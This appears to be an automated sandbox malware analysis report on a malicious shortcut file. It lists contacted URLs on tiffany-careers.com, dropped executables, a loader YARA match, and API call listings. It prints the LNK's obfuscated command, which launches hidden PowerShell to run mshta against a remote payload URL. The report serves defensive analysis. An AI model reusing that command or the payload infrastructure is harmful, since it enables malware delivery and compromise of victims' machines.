Source: powershell.exe, 00000009.00000002.1680477076.000002822EA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1932942954.000001E2ABE89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.c
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.co
Source: powershell.exe, 00000009.00000002.1608154018.000002821EC0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29CF7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29C0C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com
Source: mshta.exe, 00000006.00000002.1791096545.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486287260.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784031189.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: XKIZdXAs.exe, 0000000F.00000002.1663928310.000001B3D6438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ALGglt
Source: powershell.exe, 00000009.00000002.1608154018.000002821EC0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/Project_Information.pdf
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/X
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/XK
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/XKI
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/XKIZ
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/XKIZd
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/XKIZdX
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/XKIZdXA
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/XKIZdXAs
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/XKIZdXAs.
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/XKIZdXAs.e
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/XKIZdXAs.ex
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/XKIZdXAs.exe
Source: powershell.exe, 00000015.00000002.1740822897.000001E29C037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ZxVMIVZIX.txt
Source: mshta.exe, 00000006.00000003.1765184654.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB36000.00000004.00000020.00020000.00000000.sdmp, n5Szx8qsFB.lnkString found in binary or memory: https://tiffany-careers.com/ghep2412_2
Source: powershell.exeString found in binary or memory: https://tiffany-careers.com/ghep2412_2$global:?
Source: mshta.exe, 00000006.00000003.1770484123.0000021D20748000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784310747.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764056549.0000021D20743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1795443084.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768320287.0000021D20744000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1794143258.0000021D2068E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486253359.0000021D2073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2...
Source: mshta.exe, 00000006.00000003.1486253359.0000021D2073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2...C
Source: mshta.exe, 00000006.00000002.1794143258.0000021D2068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2...b
Source: mshta.exe, 00000006.00000002.1794143258.0000021D2068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_24d
Source: mshta.exe, 00000006.00000002.1790635120.000002151DAC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2C:
Source: mshta.exe, 00000006.00000002.1791567610.000002151DC20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2H
Source: mshta.exe, 00000006.00000002.1796653110.0000021D262A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2LMEMP
Source: powershell.exe, 00000005.00000002.1443126363.000001963619E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2P
Source: mshta.exe, 00000006.00000002.1790635120.000002151DAE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2Qa
Source: mshta.exe, 00000006.00000003.1765184654.000002151DB36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2TTC:
Source: mshta.exe, 00000006.00000003.1778172376.0000021D26645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2https://tiffany-careers.com/ghep2412_2
Source: mshta.exe, 00000006.00000002.1790635120.000002151DAE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2kk
Source: powershell.exe, 00000005.00000002.1442345728.0000019633F3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2lvEb.
Source: mshta.exe, 00000006.00000002.1790635120.000002151DAC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2nN
Source: powershell.exe, 00000005.00000002.1443126363.0000019635CF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1790844992.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2p
Source: mshta.exe, 00000006.00000002.1791681730.000002151DC80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2s
Source: mshta.exe, 00000006.00000002.1790635120.000002151DAE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2412_2t
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: SwiftWrite.pif.23.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC90D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_00007FF7ADC90D24
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC90D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_00007FF7ADC90D24
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BC4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,23_2_00BC4830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00864830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,27_2_00864830
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC90A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,15_2_00007FF7ADC90A6C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC78E18 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,15_2_00007FF7ADC78E18
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BDD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,23_2_00BDD164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0087D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,27_2_0087D164

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1], type: DROPPEDMatched rule: Emmenhtal Loader string Author: Sekoia.io
Binary is likely a compiled AutoIt script file
Source: powershell.exe, 00000009.00000002.1680477076.000002822EC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1dc1e972-3
Source: powershell.exe, 00000009.00000002.1680477076.000002822EC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_4385b895-b
Source: powershell.exe, 00000009.00000002.1680477076.000002822EEB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_20ea604d-1
Source: powershell.exe, 00000009.00000002.1680477076.000002822EEB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_14c04349-8
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: This is a third-party compiled AutoIt script.15_2_00007FF7ADC037B0
Source: XKIZdXAs.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: XKIZdXAs.exe, 0000000F.00000000.1591030460.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_86bb9fe7-7
Source: XKIZdXAs.exe, 0000000F.00000000.1591030460.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_1a937d80-3
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000000.00000002.1415926218.000001E381E8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')"``memstr_490453d5-3
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XKIZdXAs.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Windows shortcut file (LNK) contains suspicious command line arguments
Source: n5Szx8qsFB.lnkLNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')"
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC83E20: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,15_2_00007FF7ADC83E20
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC6CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,15_2_00007FF7ADC6CE68
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC7D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_00007FF7ADC7D750
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BB5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,23_2_00BB5778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00855778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,27_2_00855778
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC9F63015_2_00007FF7ADC9F630
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC10E7015_2_00007FF7ADC10E70
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC20E9015_2_00007FF7ADC20E90
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADCACE8C15_2_00007FF7ADCACE8C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC12E3015_2_00007FF7ADC12E30
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC46DE415_2_00007FF7ADC46DE4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC42D2015_2_00007FF7ADC42D20
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC330DC15_2_00007FF7ADC330DC
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC02AE015_2_00007FF7ADC02AE0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADCA0AEC15_2_00007FF7ADCA0AEC
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC96C3415_2_00007FF7ADC96C34
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADCAC6D415_2_00007FF7ADCAC6D4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADCAA59C15_2_00007FF7ADCAA59C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADCA055C15_2_00007FF7ADCA055C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC3A8A015_2_00007FF7ADC3A8A0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC467F015_2_00007FF7ADC467F0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC202C415_2_00007FF7ADC202C4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC2C13015_2_00007FF7ADC2C130
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC2451415_2_00007FF7ADC24514
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC384C015_2_00007FF7ADC384C0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC2C3FC15_2_00007FF7ADC2C3FC
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC4240015_2_00007FF7ADC42400
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC883D415_2_00007FF7ADC883D4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC9836015_2_00007FF7ADC98360
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC9632015_2_00007FF7ADC96320
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC2BEB415_2_00007FF7ADC2BEB4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC0BE7015_2_00007FF7ADC0BE70
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC9206C15_2_00007FF7ADC9206C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC05F3C15_2_00007FF7ADC05F3C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC81A1815_2_00007FF7ADC81A18
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC1FA4F15_2_00007FF7ADC1FA4F
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC0B9F015_2_00007FF7ADC0B9F0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADCABA0C15_2_00007FF7ADCABA0C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC3793C15_2_00007FF7ADC3793C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC13C2015_2_00007FF7ADC13C20
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADCADB1815_2_00007FF7ADCADB18
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC956A015_2_00007FF7ADC956A0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC395B015_2_00007FF7ADC395B0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC158D015_2_00007FF7ADC158D0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC2F8D015_2_00007FF7ADC2F8D0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC7D87C15_2_00007FF7ADC7D87C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC0183C15_2_00007FF7ADC0183C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC4184015_2_00007FF7ADC41840
